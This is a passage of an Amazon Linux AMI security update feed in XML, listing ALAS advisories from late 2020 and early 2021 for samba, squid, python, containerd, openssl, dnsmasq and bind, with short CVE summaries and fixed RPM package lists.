arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.13.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.13.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-2.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1452</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1452: medium priority package update for samba</title><issued date="2020-11-14 01:23:00" /><updated date="2020-11-16 20:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-14907:
All samba versions 4.9.x before 4.9.18, 4.10.x before 4.10.12 and 4.11.x before 4.11.5 have an issue where if it is set with "log level = 3" (or above) then the string obtained from the client, after a failed character conversion, is printed. Such strings can be provided during the NTLMSSP authentication exchange. In the Samba AD DC in particular, this may cause a long-lived process (such as the RPC server) to terminate. (In the file server case, the most likely target, smbd, operates as process-per-client and so a crash there is harmless).
1791207: CVE-2019-14907 samba: Crash after failed character conversion at log level 3 or above
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14907" title="" id="CVE-2019-14907" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-krb5-printing" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.16" release="5.54.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.16-5.54.amzn1.noarch.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="5.54.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.16" release="5.54.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.16-5.54.amzn1.noarch.rpm</filename></package><package name="ctdb" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="5.54.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libsmbclient-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="5.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.16-5.54.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="5.54.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-client-libs-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="5.54.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-winbind-clients-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.16-5.54.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="5.54.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.16-5.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1453</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1453: important priority package update for squid</title><issued date="2020-11-16 17:59:00" /><updated date="2020-11-16 20:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8450:
An issue was discovered in Squid before 4.10. Due to incorrect buffer management, a remote client can cause a buffer overflow in a Squid instance acting as a reverse proxy.
1798552: CVE-2020-8450 squid: Buffer overflow in reverse-proxy configurations
1798552: CVE-2020-8450 squid: Buffer overflow in a Squid acting as reverse-proxy
CVE-2020-8449:
An issue was discovered in Squid before 4.10. Due to incorrect input validation, it can interpret crafted HTTP requests in unexpected ways to access server resources prohibited by earlier security filters.
1798540: CVE-2020-8449 squid: Improper input validation issues in HTTP Request processing
CVE-2020-24606:
Squid before 4.13 and 5.x before 5.0.4 allows a trusted peer to perform Denial of Service by consuming all available CPU cycles during handling of a crafted Cache Digest response message. This only occurs when cache_peer is used with the cache digests feature. The problem exists because peerDigestHandleReply() livelocking in peer_digest.cc mishandles EOF.
1871705: CVE-2020-24606 squid: Improper input validation could result in a DoS
CVE-2020-15811:
A flaw was found in squid. Due to incorrect data validation, an HTTP Request Splitting attack against HTTP and HTTPS traffic is possible leading to cache poisoning. The highest threat from this vulnerability is to data confidentiality and integrity.
1871702: CVE-2020-15811 squid: HTTP Request Splitting could result in cache poisoning
CVE-2020-15810:
A flaw was found in squid. Due to incorrect data validation, an HTTP Request Smuggling attack against HTTP and HTTPS traffic is possible leading to cache poisoning. The highest threat from this vulnerability is to data confidentiality and integrity.
1871700: CVE-2020-15810 squid: HTTP Request Smuggling could result in cache poisoning
CVE-2020-15049:
An issue was discovered in http/ContentLengthInterpreter.cc in Squid before 4.12 and 5.x before 5.0.3. A Request Smuggling and Poisoning attack can succeed against the HTTP cache. The client sends an HTTP request with a Content-Length header containing "+\ "-" or an uncommon shell whitespace character prefix to the length field-value.
1852550: CVE-2020-15049 squid: Request smuggling and poisoning attack against the HTTP cache
CVE-2019-12528:
An issue was discovered in Squid before 4.10. It allows a crafted FTP server to trigger disclosure of sensitive information from heap memory, such as information associated with other users' sessions or non-Squid processes.
1798534: CVE-2019-12528 squid: Information Disclosure issue in FTP Gateway
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12528" title="" id="CVE-2019-12528" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15049" title="" id="CVE-2020-15049" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15810" title="" id="CVE-2020-15810" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15811" title="" id="CVE-2020-15811" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24606" title="" id="CVE-2020-24606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8449" title="" id="CVE-2020-8449" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8450" title="" id="CVE-2020-8450" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.5.20" release="17.41.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.41.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.41.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.41.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.41.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.41.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.41.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.41.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.41.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.41.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.41.amzn1" epoch="7" 
arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1454</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1454: medium priority package update for python27 python34 python35</title><issued date="2020-11-16 17:59:00" /><updated date="2020-11-16 20:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-26116:
http.client in Python 3.x before 3.5.10, 3.6.x before 3.6.12, 3.7.x before 3.7.9, and 3.8.x before 3.8.5 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of HTTPConnection.request.
1883014: CVE-2020-26116 python: CRLF injection via HTTP request method in httplib/http.client
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26116" title="" id="CVE-2020-26116" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python35-devel" version="3.5.10" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.10-1.29.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.10" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.10-1.29.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.10" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.10-1.29.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.10" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.10-1.29.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.10" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.10-1.29.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.10" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.10-1.29.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.10" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/python35-tools-3.5.10-1.29.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.10" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.10-1.29.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.10" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.10-1.29.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.10" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.10-1.29.amzn1.i686.rpm</filename></package><package name="python35-test" 
version="3.5.10" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.10-1.29.amzn1.i686.rpm</filename></package><package name="python35-libs" version="3.5.10" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.10-1.29.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.140.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.140.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.140.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.140.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.140.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.140.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.140.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.140.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.140.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.140.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.140.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.140.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.140.amzn1" epoch="0" 
arch="i686"><filename>Packages/python27-libs-2.7.18-2.140.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.140.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.140.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.140.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.140.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.53.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.53.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.53.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.53.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.53.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.53.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.53.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.53.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.53.amzn1" epoch="0" 
arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.53.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.53.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.53.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1455</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1455: important priority package update for containerd</title><issued date="2020-11-20 17:29:00" /><updated date="2020-11-30 20:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-15257:
CVE-2020-15257: Access controls for the shim's API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in the same network namespace as the shim, with an effective UID of 0 but otherwise reduced privileges, to cause new processes to be run with elevated privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15257" title="" id="CVE-2020-15257" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="containerd" version="1.4.1" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-1.4.1-2.6.amzn1.x86_64.rpm</filename></package><package name="containerd-stress" version="1.4.1" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-stress-1.4.1-2.6.amzn1.x86_64.rpm</filename></package><package name="containerd-debuginfo" version="1.4.1" release="2.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/containerd-debuginfo-1.4.1-2.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1456</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1456: important priority package update for openssl</title><issued date="2020-12-08 19:28:00" /><updated date="2020-12-08 23:28:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1971:
A null pointer dereference flaw was found in openssl. A remote attacker, able to control the arguments of the GENERAL_NAME_cmp function, could cause the application, compiled with openssl, to crash, resulting in a denial of service. The highest threat from this vulnerability is to system availability.
1903409: CVE-2020-1971 openssl: EDIPARTYNAME NULL pointer de-reference
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971" title="" id="CVE-2020-1971" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.152.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.152.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.152.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.152.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.152.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.152.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.152.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.152.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.152.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.152.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.152.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.152.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1458</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1458: low priority package update for dnsmasq</title><issued date="2020-12-16 20:31:00" /><updated date="2023-03-22 18:52:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-14834:
A flaw was found in the Dnsmasq application where a remote attacker can trigger a memory leak by sending specially crafted DHCP responses to the server. A successful attack is dependent on a specific configuration regarding the domain name set into the dnsmasq.conf file. Over time, the memory leak may cause the process to run out of memory and terminate, causing a denial of service.
1764425: CVE-2019-14834 dnsmasq: memory leak in the create_helper() function in /src/helper.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14834" title="" id="CVE-2019-14834" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dnsmasq-utils" version="2.76" release="16.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-utils-2.76-16.16.amzn1.x86_64.rpm</filename></package><package name="dnsmasq" version="2.76" release="16.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-2.76-16.16.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.76" release="16.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/dnsmasq-debuginfo-2.76-16.16.amzn1.x86_64.rpm</filename></package><package name="dnsmasq-debuginfo" version="2.76" release="16.16.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-debuginfo-2.76-16.16.amzn1.i686.rpm</filename></package><package name="dnsmasq-utils" version="2.76" release="16.16.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-utils-2.76-16.16.amzn1.i686.rpm</filename></package><package name="dnsmasq" version="2.76" release="16.16.amzn1" epoch="0" arch="i686"><filename>Packages/dnsmasq-2.76-16.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1457</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1457: medium priority package update for bind</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:03:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8622:
A flaw was found in bind. An assertion failure can occur when trying to verify a truncated response to a TSIG-signed request. The highest threat from this vulnerability is to system availability.
1869473: CVE-2020-8622 bind: truncated TSIG response can lead to an assertion failure
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8622" title="" id="CVE-2020-8622" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.85.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.85.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.85.amzn1" epoch="32" 
